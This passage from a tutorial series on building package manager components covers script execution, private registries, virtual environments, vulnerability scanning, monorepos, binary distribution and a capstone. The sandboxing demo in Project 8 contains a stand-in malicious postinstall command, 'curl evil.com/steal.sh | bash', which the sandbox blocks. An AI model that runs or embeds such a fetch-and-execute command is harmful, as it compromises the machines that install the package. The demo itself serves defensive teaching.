$ cat package.json
{
"name": "native-addon",
"scripts": {
"preinstall": "echo 'Checking system requirements...'",
"install": "node-gyp rebuild",
"postinstall": "node ./setup.js"
}
}
$ ./script-runner execute ./package.json --phase=install
[preinstall] Running: echo 'Checking system requirements...'
[preinstall] Checking system requirements...
[preinstall] ✓ Completed in 0.01s
[install] Running: node-gyp rebuild
[install] Setting up environment...
[install] CC=/usr/bin/clang
[install] CXX=/usr/bin/clang++
[install] npm_config_node_gyp=/usr/local/lib/node_modules/node-gyp
[install] Compiling native addon...
[install] gyp info spawn clang++
[install] gyp info spawn args ['-fPIC', '-shared', '-o', 'build/Release/addon.node', ...]
[install] ✓ Completed in 4.2s
[postinstall] Running: node ./setup.js
[postinstall] Creating configuration file...
[postinstall] ✓ Completed in 0.3s
All scripts completed successfully.
$ ./script-runner execute ./malicious-package --sandbox
[postinstall] Running: curl evil.com/steal.sh | bash
[postinstall] ⚠️ BLOCKED: Network access denied (sandbox policy)
[postinstall] ✗ Script terminated
Security report:
Attempted network connections: 1 (blocked)
Attempted filesystem writes outside package: 0
Recommendation: Review this package before installing with --ignore-scripts
Implementation Hints:
- Use os/exec (Go), subprocess (Python), or std::process::Command (Rust) for spawning
- Set up environment variables like npm_package_name, npm_lifecycle_event, PATH (including node_modules/.bin)
- For sandboxing on Linux, consider using seccomp, namespaces, or running in a container
- On macOS, use sandbox-exec with a profile that restricts network and filesystem
- Implement timeouts with context.WithTimeout (Go) or similar
- Capture both stdout and stderr, stream them with prefixes for visibility
Learning milestones:
- Execute lifecycle scripts in order → You understand npm’s script phases
- Set up proper build environment → You understand native compilation
- Implement basic sandboxing → You understand security concerns
- Handle failures and timeouts gracefully → You understand robustness
Project 9: Private Registry Server
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, TypeScript
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 4. The “Open Core” Infrastructure
- Difficulty: Level 3: Advanced
- Knowledge Area: HTTP Servers / APIs
- Software or Tool: Private npm/Cargo Registry
- Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann
What you’ll build: A private package registry server compatible with npm or Cargo that can host internal packages, proxy to public registries (with caching), and handle publishing with authentication.
Why it teaches package managers: You’ll understand the server side—how registries store metadata, serve tarballs, handle authentication, and why companies run private registries for proprietary code. This is the complement to Project 4 (registry client).
Core challenges you’ll face:
- Implementing the registry API (GET /package, PUT /-/package) → maps to API design
- Storing package metadata (database or filesystem) → maps to data persistence
- Proxying to upstream registries (npmjs.org) with caching → maps to caching proxies
- Authentication and authorization (tokens, scopes) → maps to security
- Handling package publishing (upload, validate, store) → maps to write APIs
Resources for key challenges:
- Cargo Registry Index - How Cargo’s registry protocol works
- npm Registry API - npm’s protocol specification
Key Concepts:
- HTTP Server Design: “Design and Build Great Web APIs” Chapter 5 - Mike Amundsen
- Caching Proxies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann
- Authentication Patterns: “Foundations of Information Security” Chapter 7 - Jason Andress
- Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann
Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: HTTP server development, database basics, authentication
Real world outcome:
# Start your private registry
$ ./registry-server --port 4873 --storage ./packages --upstream https://registry.npmjs.org
Private Registry Server
Listening: http://localhost:4873
Storage: ./packages (142 cached packages)
Upstream: https://registry.npmjs.org (proxy enabled)
# Configure npm to use your registry
$ npm config set registry http://localhost:4873
# Install a public package (proxied and cached)
$ npm install lodash
[registry] GET /lodash
[registry] Cache miss - proxying to upstream
[registry] Caching lodash@4.17.21 (308KB)
[registry] 200 OK (1.2s)
# Install same package again (served from cache)
$ npm install lodash
[registry] GET /lodash
[registry] Cache hit ✓
[registry] 200 OK (12ms)
# Publish a private package
$ npm publish ./my-internal-lib
[registry] PUT /-/package/my-internal-lib
[registry] Authenticated: token=npm_xxx...
[registry] Validating package...
[registry] Storing my-internal-lib@1.0.0 (24KB)
[registry] 201 Created
# Search private packages
$ curl http://localhost:4873/-/v1/search?text=my-internal
{
"objects": [{
"package": {
"name": "my-internal-lib",
"version": "1.0.0",
"private": true
}
}]
}
Implementation Hints:
- For npm compatibility, implement these endpoints: GET /:package, GET /:package/:version, PUT /:package, GET /-/v1/search
- Store metadata as JSON files: storage/package-name/package.json
- Store tarballs: storage/package-name/package-name-version.tgz
- For proxying, first check local storage, then fetch from upstream and cache (sketched below)
- Use bearer token authentication matching npm's format
- Consider using SQLite for metadata and filesystem for tarballs for simplicity
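A read-path sketch of the caching proxy using only the Python standard library (the project's main language is Go): metadata requests are served from ./storage when cached, otherwise fetched from the upstream registry and stored. Publishing, auth, and tarball URL rewriting are left for the full project.

```python
# Minimal caching proxy for registry metadata requests.
import http.server, pathlib, urllib.request

UPSTREAM = "https://registry.npmjs.org"
STORAGE = pathlib.Path("storage")

class RegistryHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        cached = STORAGE / (self.path.strip("/").replace("/", "__") + ".json")
        if cached.exists():
            body = cached.read_bytes()
            print(f"[registry] {self.path} cache hit")
        else:
            with urllib.request.urlopen(UPSTREAM + self.path) as resp:
                body = resp.read()
            cached.parent.mkdir(parents=True, exist_ok=True)
            cached.write_bytes(body)
            print(f"[registry] {self.path} cache miss, cached {len(body)} bytes")
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    http.server.HTTPServer(("localhost", 4873), RegistryHandler).serve_forever()
```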
Learning milestones:
- Serve package metadata and tarballs → You understand the read API
- Proxy and cache from upstream → You understand caching registries
- Handle publishing with auth → You understand the write API
- Support search and listing → You understand registry discovery
Project 10: Virtual Environment Manager
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, Python, C
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 3: Advanced
- Knowledge Area: Environment Isolation / Shells
- Software or Tool: venv/virtualenv Clone
- Main Book: “The Linux Programming Interface” by Michael Kerrisk
What you’ll build: A tool that creates isolated environments with their own bin/, lib/, and package directories, activates/deactivates them by modifying PATH, and ensures packages installed in one env don’t affect another.
Why it teaches package managers: Python’s virtualenv, Ruby’s rbenv, Node’s nvm—all solve the “multiple projects, different versions” problem. You’ll understand how environment isolation actually works (it’s mostly PATH manipulation and symlinks).
Core challenges you’ll face:
- Creating isolated directory structures → maps to filesystem organization
- Generating activation scripts (bash, zsh, fish) → maps to shell integration
- PATH manipulation (prepend env’s bin/) → maps to environment variables
- Isolating package installations (pip install goes to env) → maps to tool configuration
- Detecting current environment (which env am I in?) → maps to state tracking
Key Concepts:
- Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
- Shell Scripting: “Effective Shell” Chapters 15-20 - Dave Kerr
- Python’s venv: venv documentation - Reference implementation
- PATH Mechanics: “How Linux Works, 3rd Edition” Chapter 2 - Brian Ward
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Shell scripting, environment variables, PATH understanding
Real world outcome:
$ ./venv-manager create myproject --python 3.11
Creating virtual environment 'myproject'...
Base Python: /usr/bin/python3.11
Environment: ~/.venvs/myproject/
Creating directory structure:
✓ ~/.venvs/myproject/bin/
✓ ~/.venvs/myproject/lib/python3.11/site-packages/
✓ ~/.venvs/myproject/include/
Creating symlinks:
✓ bin/python → /usr/bin/python3.11
✓ bin/python3 → python
Generating activation scripts:
✓ bin/activate (bash/zsh)
✓ bin/activate.fish
✓ bin/activate.ps1
✓ Environment created. Activate with:
source ~/.venvs/myproject/bin/activate
$ source ~/.venvs/myproject/bin/activate
(myproject) $ which python
~/.venvs/myproject/bin/python
(myproject) $ pip install requests
# Installs to ~/.venvs/myproject/lib/python3.11/site-packages/
(myproject) $ pip list
Package Version
---------- -------
requests 2.31.0
urllib3 2.1.0
pip 23.3.1
(myproject) $ deactivate
$ which python
/usr/bin/python3
$ pip list
# Shows system packages, not myproject's
Implementation Hints:
- The key insight: virtual environments work by prepending their bin/ to PATH
- Generate an activate script that: saves old PATH, prepends new PATH, sets PS1 prompt, defines a deactivate function
- Create symlinks from env/bin/python to the actual interpreter
- For Python, also set the VIRTUAL_ENV environment variable (pip uses this to know where to install)
- The pyvenv.cfg file tells Python to use the environment's site-packages
- Consider supporting multiple shells (bash, zsh, fish have different syntax)
Learning milestones:
- Create isolated directory structure → You understand env layout
- Generate working activation scripts → You understand shell integration
- Packages install to correct location → You understand isolation
- Multiple envs coexist without conflict → You understand the full system
Project 11: Package Vulnerability Scanner
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 2: Intermediate
- Knowledge Area: Security / APIs
- Software or Tool: npm audit / cargo audit Clone
- Main Book: “Foundations of Information Security” by Jason Andress
What you’ll build: A scanner that reads your lock file, queries vulnerability databases (like OSV, GitHub Advisory Database, or npm’s audit API), and reports known CVEs with severity ratings and remediation advice.
Why it teaches package managers: Modern package managers include npm audit and cargo audit because supply chain security matters. You’ll understand how vulnerability databases work, why SBOMs (Software Bills of Materials) exist, and how to assess risk.
Core challenges you’ll face:
- Parsing lock files (extract package names and exact versions) → maps to file parsing
- Querying vulnerability APIs (OSV, GitHub, npm) → maps to API integration
- Matching versions to advisories (is 4.17.15 affected by CVE-2021-xxxx?) → maps to version ranges
- Severity scoring (CVSS, understanding impact) → maps to risk assessment
- Generating actionable reports (what to upgrade to) → maps to user experience
Resources for key challenges:
- OSV (Open Source Vulnerabilities) - Google’s aggregated vulnerability database with API
- GitHub Advisory Database - GitHub’s security advisories
- npm Audit API - npm’s built-in auditing
Key Concepts:
- CVE and CVSS: “Foundations of Information Security” Chapter 15 - Jason Andress
- Software Bill of Materials: SBOM Overview - CISA guidance
- API Integration: “Design and Build Great Web APIs” Chapter 4 - Mike Amundsen
- Supply Chain Security: “Practical Malware Analysis” Chapter 1 (concepts) - Sikorski & Honig
Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP APIs, JSON parsing, lock file understanding
Real world outcome:
$ ./vuln-scanner scan package-lock.json
Scanning 247 packages from package-lock.json...
Querying OSV database...
Found 3 vulnerabilities:
┌────────────────────────────────────────────────────────────────────┐
│ CRITICAL: lodash < 4.17.21 │
│ CVE-2021-23337 - Command Injection │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 4.17.15 │
│ Fixed in: 4.17.21 │
│ CVSS: 9.8 (Critical) │
│ Introduced by: express → body-parser → lodash │
│ │
│ Remediation: npm update lodash │
└────────────────────────────────────────────────────────────────────┘
┌────────────────────────────────────────────────────────────────────┐
│ HIGH: minimist < 1.2.6 │
│ CVE-2021-44906 - Prototype Pollution │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 1.2.0 │
│ Fixed in: 1.2.6 │
│ CVSS: 7.5 (High) │
│ Introduced by: mocha → mkdirp → minimist │
│ │
│ Remediation: npm update minimist │
└────────────────────────────────────────────────────────────────────┘
┌────────────────────────────────────────────────────────────────────┐
│ MODERATE: glob-parent < 5.1.2 │
│ CVE-2020-28469 - Regular Expression DoS │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 5.0.0 │
│ Fixed in: 5.1.2 │
│ CVSS: 5.3 (Moderate) │
│ │
│ Remediation: npm update glob-parent │
└────────────────────────────────────────────────────────────────────┘
Summary:
Total packages: 247
Vulnerabilities: 3 (1 critical, 1 high, 1 moderate)
Run with --fix to automatically update vulnerable packages.
Implementation Hints:
- OSV API: POST https://api.osv.dev/v1/querybatch with a list of packages (see the query sketch below)
- Parse lock files to extract {"package": {"name": "...", "ecosystem": "npm"}, "version": "..."}
- Match advisory affected ranges against installed versions (use your semver library from Project 1!)
- CVSS scores: 0.1-3.9 (Low), 4.0-6.9 (Medium), 7.0-8.9 (High), 9.0-10.0 (Critical)
- For remediation, find the minimum fixed version that satisfies the original constraint
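A batch-query sketch against OSV's /v1/querybatch endpoint in Python (the project's main language is Go), with lock-file parsing reduced to a hard-coded package list. The response carries only advisory IDs, so a real scanner would follow up with /v1/vulns/<id> for severity and remediation details.

```python
# Query OSV for known advisories affecting specific package versions.
import json, urllib.request

packages = [("lodash", "4.17.15"), ("minimist", "1.2.0")]

queries = {"queries": [
    {"package": {"name": name, "ecosystem": "npm"}, "version": version}
    for name, version in packages
]}
req = urllib.request.Request(
    "https://api.osv.dev/v1/querybatch",
    data=json.dumps(queries).encode(),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as resp:
    results = json.load(resp)["results"]

for (name, version), result in zip(packages, results):
    ids = [v["id"] for v in result.get("vulns", [])]
    print(f"{name}@{version}: {len(ids)} advisories {ids[:3]}")
```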
Learning milestones:
- Parse lock files and query APIs → You understand the data flow
- Match versions to advisories → You understand vulnerability ranges
- Generate actionable reports → You understand security UX
- Trace vulnerability paths → You understand transitive dependencies
Project 12: Monorepo Workspace Manager
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: TypeScript
- Alternative Programming Languages: Rust, Go, Python
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 4. The “Open Core” Infrastructure
- Difficulty: Level 4: Expert
- Knowledge Area: Build Systems / Graph Algorithms
- Software or Tool: npm workspaces / Turborepo Clone
- Main Book: “Software Architecture in Practice” by Bass, Clements & Kazman
What you’ll build: A monorepo manager that handles multiple packages in one repository, manages inter-package dependencies, builds in correct order with caching, and only rebuilds what changed.
Why it teaches package managers: Modern development uses monorepos (Google, Facebook, Microsoft). Tools like Lerna, Nx, and Turborepo add layers on top of package managers. You’ll understand workspace protocols, local dependencies, and incremental builds.
Core challenges you’ll face:
- Workspace discovery (find all packages in repo) → maps to filesystem traversal
- Local dependency linking (pkg-a depends on pkg-b in same repo) → maps to symlinks
- Topological build order (build deps before dependents) → maps to graph algorithms
- Incremental builds (only rebuild what changed) → maps to change detection
- Task caching (don’t rebuild if inputs unchanged) → maps to content-addressable caching
Key Concepts:
- Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
- Build Systems: “The GNU Make Book” Chapter 1 - John Graham-Cumming
- Content Hashing: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann
- Monorepo Patterns: Turborepo docs - Architecture explanation
Difficulty: Expert Time estimate: 3-4 weeks Prerequisites: All previous projects, build system understanding
Real world outcome:
$ tree packages/
packages/
├── core/
│ ├── package.json # "name": "@myorg/core"
│ └── src/
├── utils/
│ ├── package.json # "name": "@myorg/utils", deps: ["@myorg/core"]
│ └── src/
├── api/
│ ├── package.json # "name": "@myorg/api", deps: ["@myorg/core", "@myorg/utils"]
│ └── src/
└── web/
├── package.json # "name": "@myorg/web", deps: ["@myorg/api"]
└── src/
$ ./workspace-manager analyze
Workspace: 4 packages
@myorg/core (0 internal deps)
@myorg/utils (1 internal dep: core)
@myorg/api (2 internal deps: core, utils)
@myorg/web (1 internal dep: api)
Build order (topological):
1. @myorg/core
2. @myorg/utils
3. @myorg/api
4. @myorg/web
$ ./workspace-manager build
Building workspace...
@myorg/core
Hash: a1b2c3d4
Cache: MISS
Building... ✓ (2.1s)
@myorg/utils
Hash: e5f6g7h8
Cache: MISS
Building... ✓ (1.3s)
@myorg/api
Hash: i9j0k1l2
Cache: MISS
Building... ✓ (3.7s)
@myorg/web
Hash: m3n4o5p6
Cache: MISS
Building... ✓ (8.2s)
Total: 15.3s (0 cached)
# Make a change only to @myorg/utils
$ ./workspace-manager build
Building workspace (incremental)...
@myorg/core
Hash: a1b2c3d4
Cache: HIT ✓ (restored in 0.1s)
@myorg/utils
Hash: q7r8s9t0 (changed)
Cache: MISS
Building... ✓ (1.3s)
@myorg/api
Hash: u1v2w3x4 (deps changed)
Cache: MISS
Building... ✓ (3.7s)
@myorg/web
Hash: y5z6a7b8 (deps changed)
Cache: MISS
Building... ✓ (8.2s)
Total: 13.4s (1 cached, saved 2.1s)
Implementation Hints:
- Discover workspaces by finding all package.json files matched by workspace globs (e.g., "workspaces": ["packages/*"])
- Local dependencies are detected when a dep name matches another workspace package
- For linking, create symlinks in node_modules pointing to the local package
- Compute content hashes by hashing all input files (source, package.json) and dependency hashes
- Store cache in .workspace-cache/ with the hash as filename
- When a package's hash changes, all dependents must also be considered changed
Learning milestones:
- Discover and link workspaces → You understand monorepo structure
- Build in topological order → You understand dependency ordering
- Implement content-based caching → You understand incremental builds
- Only rebuild affected packages → You understand the full system
Project 13: Binary Distribution (Platform-Specific Packages)
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, C, C++
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 4: Expert
- Knowledge Area: Cross-Compilation / Platform Detection
- Software or Tool: Binary Package Distributor
- Main Book: “Advanced C and C++ Compiling” by Milan Stevanovic
What you’ll build: A system that builds your CLI tool for multiple platforms (linux-x64, darwin-arm64, windows-x64), packages them with platform-specific metadata, and serves the correct binary based on the user’s system.
Why it teaches package managers: When you npm install esbuild or cargo install ripgrep, how does it know to download the macOS ARM binary on your M1 Mac? This project reveals platform detection, optional dependencies, and binary distribution.
Core challenges you’ll face:
- Cross-compilation (build for different OS/arch from one machine) → maps to compiler toolchains
- Platform detection (os.platform(), os.arch()) → maps to system identification
- Optional/platform-specific dependencies (optionalDependencies in npm) → maps to conditional deps
- Binary packaging (tarballs, zips, npm packages) → maps to distribution formats
- Installation selection (pick correct binary at install time) → maps to runtime selection
Key Concepts:
- Cross-Compilation: “Advanced C and C++ Compiling” Chapter 9 - Milan Stevanovic
- Platform Detection: “The Linux Programming Interface” Chapter 12 - Michael Kerrisk
- npm optionalDependencies: npm docs - How esbuild does it
- ABI Compatibility: “Low-Level Programming” Chapter 14 - Igor Zhirkov
Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Cross-compilation basics, platform differences
Real world outcome:
$ ./platform-builder build ./my-cli
Cross-compiling my-cli for 6 platforms...
linux-x64:
Toolchain: x86_64-unknown-linux-gnu
Building... ✓
Binary: 4.2 MB
linux-arm64:
Toolchain: aarch64-unknown-linux-gnu
Building... ✓
Binary: 3.8 MB
darwin-x64:
Toolchain: x86_64-apple-darwin
Building... ✓
Binary: 3.9 MB
darwin-arm64:
Toolchain: aarch64-apple-darwin
Building... ✓
Binary: 3.6 MB
win32-x64:
Toolchain: x86_64-pc-windows-msvc
Building... ✓
Binary: 4.8 MB (my-cli.exe)
win32-arm64:
Toolchain: aarch64-pc-windows-msvc
Building... ✓
Binary: 4.1 MB
Creating npm packages...
@my-cli/linux-x64@1.0.0 → dist/my-cli-linux-x64-1.0.0.tgz
@my-cli/linux-arm64@1.0.0 → dist/my-cli-linux-arm64-1.0.0.tgz
@my-cli/darwin-x64@1.0.0 → dist/my-cli-darwin-x64-1.0.0.tgz
@my-cli/darwin-arm64@1.0.0 → dist/my-cli-darwin-arm64-1.0.0.tgz
@my-cli/win32-x64@1.0.0 → dist/my-cli-win32-x64-1.0.0.tgz
@my-cli/win32-arm64@1.0.0 → dist/my-cli-win32-arm64-1.0.0.tgz
Creating wrapper package...
my-cli@1.0.0 → dist/my-cli-1.0.0.tgz
optionalDependencies: {
"@my-cli/linux-x64": "1.0.0",
"@my-cli/darwin-arm64": "1.0.0",
...
}
# On user's machine (macOS ARM):
$ npm install my-cli
Installing my-cli...
Resolving platform: darwin-arm64
Selected: @my-cli/darwin-arm64
Downloading... ✓
$ npx my-cli --version
my-cli 1.0.0 (darwin-arm64)
Implementation Hints:
- Use Rust's cross-compilation with the cross tool, or Go's GOOS=linux GOARCH=amd64
- npm's optionalDependencies are tried but don't fail if unavailable; use this for platform packages
- The wrapper package has a postinstall script that copies the correct binary from the platform package
- Use os.platform() and os.arch() in Node.js to detect the current platform
- Consider supporting fallback to building from source if no binary is available
Learning milestones:
- Cross-compile for multiple platforms → You understand toolchains
- Create platform-specific npm packages → You understand distribution
- Automatically select correct binary → You understand platform detection
- Handle missing platforms gracefully → You understand fallbacks
Project 14: Full Package Manager (Capstone)
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, C
- Coolness Level: Level 5: Pure Magic (Super Cool)
- Business Potential: 5. The “Industry Disruptor” (VC-Backable Platform)
- Difficulty: Level 5: Master
- Knowledge Area: Systems Programming / Full Stack
- Software or Tool: Complete Package Manager
- Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann
What you’ll build: A complete, working package manager with its own manifest format, lock files, registry, dependency resolution, installation, and CLI—capable of managing real projects.
Why it teaches package managers: This is the capstone. You’ll integrate everything: semver parsing, dependency resolution, registry protocol, lock files, installation, caching, and security. You’ll understand why npm, Cargo, and pip made the design decisions they did.
Core challenges you’ll face:
- Designing a manifest format (your own package.json/Cargo.toml) → maps to language design
- Implementing full resolution (SAT-based or backtracking) → maps to algorithms
- Building a registry server (with publish/download APIs) → maps to distributed systems
- Efficient caching (content-addressable, shared across projects) → maps to storage
- Good CLI UX (progress bars, error messages, colors) → maps to user experience
- Security (checksums, sandboxed scripts, vulnerability checks) → maps to security engineering
Key Concepts:
- All previous project concepts, integrated
- CLI Design: “The Pragmatic Programmer” Chapter 7 - Thomas & Hunt
- API Design: “Design and Build Great Web APIs” - Mike Amundsen
- Systems Architecture: “Designing Data-Intensive Applications” - Martin Kleppmann
Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects (1-13)
Real world outcome:
$ mypkg init my-project
Creating new project: my-project
✓ Created mypkg.toml
✓ Created mypkg.lock
✓ Created src/main.rs
$ cat mypkg.toml
[package]
name = "my-project"
version = "0.1.0"
[dependencies]
json = "^1.0"
http-client = "^2.0"
$ mypkg install
Resolving dependencies...
json: 12 versions available
http-client: 8 versions available
Running SAT solver...
✓ Solution found in 23ms
Fetching packages...
▸ json@1.2.3 [████████████████████] 100%
▸ http-client@2.1.0 [████████████████████] 100%
▸ url-parser@1.0.0 [████████████████████] 100% (transitive)
Installing to ./mypkg_modules/...
✓ json@1.2.3
✓ url-parser@1.0.0
✓ http-client@2.1.0
Generating lock file...
✓ mypkg.lock updated
Installed 3 packages in 1.2s
$ mypkg audit
Scanning for vulnerabilities...
✓ No known vulnerabilities found
$ mypkg publish
Publishing my-project@0.1.0...
Packing... ✓ (12 files, 24KB)
Computing integrity... sha512-abc123...
Uploading to registry.mypkg.dev...
✓ Published my-project@0.1.0
View at: https://registry.mypkg.dev/packages/my-project
Implementation Hints:
- Start by defining your manifest format (TOML is recommended for readability)
- Implement the core loop: parse manifest → resolve deps → fetch packages → install → generate lock
- Build the registry server alongside the client (you’ll need both)
- Focus on good error messages—package manager errors are notoriously cryptic
- Implement a global cache (~/.mypkg/cache/) shared across all projects
- Add --verbose and --debug flags for troubleshooting
- Consider writing a specification document for your package format
Learning milestones:
- Basic install flow works → Core system functions
- Lock file enables reproducibility → Deterministic builds
- Registry handles publish/download → Distributed system works
- Resolution handles complex graphs → Algorithm is correct
- Real projects can use it → It’s a real package manager!
Project Comparison Table
| Project | Difficulty | Time | Depth of Understanding | Fun Factor |
|---|---|---|---|---|
| 1. Semver Parser | Intermediate | Weekend | ★★☆☆☆ | ★★☆☆☆ |
| 2. Dependency Graph | Intermediate | Weekend | ★★★☆☆ | ★★★☆☆ |
| 3. SAT Solver | Expert | 2-4 weeks | ★★★★★ | ★★★★☆ |
| 4. Registry Client | Intermediate | 1 week | ★★★☆☆ | ★★★☆☆ |
| 5. Lock File Generator | Advanced | 1-2 weeks | ★★★★☆ | ★★★☆☆ |
| 6. Cellar Installer | Advanced | 1-2 weeks | ★★★★☆ | ★★★★☆ |
| 7. node_modules Hoisting | Advanced | 1-2 weeks | ★★★★☆ | ★★★☆☆ |
| 8. Build Script Executor | Advanced | 1-2 weeks | ★★★☆☆ | ★★★☆☆ |
| 9. Private Registry | Advanced | 2-3 weeks | ★★★★☆ | ★★★★☆ |
| 10. Virtual Env Manager | Advanced | 1-2 weeks | ★★★☆☆ | ★★★☆☆ |
| 11. Vulnerability Scanner | Intermediate | 1 week | ★★★☆☆ | ★★★★☆ |
| 12. Monorepo Manager | Expert | 3-4 weeks | ★★★★★ | ★★★★☆ |
| 13. Binary Distribution | Expert | 2-3 weeks | ★★★★☆ | ★★★★☆ |
| 14. Full Package Manager | Master | 2-3 months | ★★★★★ | ★★★★★ |
Recommended Learning Path
Based on building a solid foundation before tackling complex integration:
Phase 1: Foundations (2-3 weeks)
- Project 1: Semver Parser - You’ll use this everywhere
- Project 2: Dependency Graph - Core data structure
Phase 2: Core Mechanics (4-6 weeks)
- Project 4: Registry Client - Understand the network layer
- Project 5: Lock File Generator - Understand reproducibility
- Project 6: Cellar Installer - Understand installation
Phase 3: Advanced Topics (6-8 weeks)
- Project 3: SAT Solver - The hard problem
- Project 9: Private Registry - Server-side understanding
- Project 7: node_modules Hoisting - npm’s complexity
Phase 4: Security & Scale (4-6 weeks)
- Project 11: Vulnerability Scanner - Security matters
- Project 8: Build Script Executor - Handle native code
- Project 12: Monorepo Manager - Enterprise patterns
Phase 5: Capstone (2-3 months)
- Project 14: Full Package Manager - Put it all together
Final Capstone: “MyPkg” - A Complete Package Manager
If you complete projects 1-13, you’ll have built all the pieces. The capstone (Project 14) is integrating them into a cohesive, usable system. Here’s what makes it real:
A working package manager needs:
- A name and identity (logo, docs site, CLI personality)
- A specification document (what’s valid, what’s not)
- A registry (even if just local file-based to start)
- Error messages that help users fix problems
- Performance that doesn’t frustrate users
- At least one real project using it
You’ll know you’ve succeeded when:
- Someone else can read your spec and implement a compatible client
- A real project can be managed entirely with your tool
- Resolution handles diamond dependencies correctly
- The lock file produces identical installations across machines
- Your CLI feels as polished as npm or Cargo
This is a journey from “package managers are magic” to “I could build npm.” By the end, you’ll have a deep understanding of one of the most important pieces of modern development infrastructure.
Key Resources Summary
Essential Reading
- “Designing Data-Intensive Applications” by Martin Kleppmann - For understanding caching, content addressing, distributed systems
- “The Linux Programming Interface” by Michael Kerrisk - For filesystem, processes, and low-level operations
- “Algorithms, Fourth Edition” by Sedgewick & Wayne - For graph algorithms and data structures
Online Resources
- Dependency Resolution Made Simple - Best SAT-based resolver tutorial
- Version SAT - Why package management is NP-complete
- Let’s Dev: A Package Manager - Yarn team’s tutorial
- npm Registry API - npm protocol spec
- Cargo Registry Index - Cargo protocol spec
Reference Implementations to Study
- pnpm - Innovative content-addressable approach
- uv - Fast Python package manager in Rust
- Cargo - Well-designed, readable codebase
- Verdaccio - Private npm registry
Summary
| # | Project | Main Language |
|---|---|---|
| 1 | Semver Parser & Comparator | Rust |
| 2 | Dependency Graph Builder & Cycle Detector | Python |
| 3 | Version Constraint SAT Solver | Python |
| 4 | Package Registry Client | Go |
| 5 | Lock File Generator | Rust |
| 6 | Cellar-Style Package Installer | C |
| 7 | node_modules Hoisting Simulator | TypeScript |
| 8 | Build Script Executor | Go |
| 9 | Private Registry Server | Go |
| 10 | Virtual Environment Manager | Rust |
| 11 | Package Vulnerability Scanner | Go |
| 12 | Monorepo Workspace Manager | TypeScript |
| 13 | Binary Distribution System | Rust |
| 14 | Full Package Manager (Capstone) | Rust |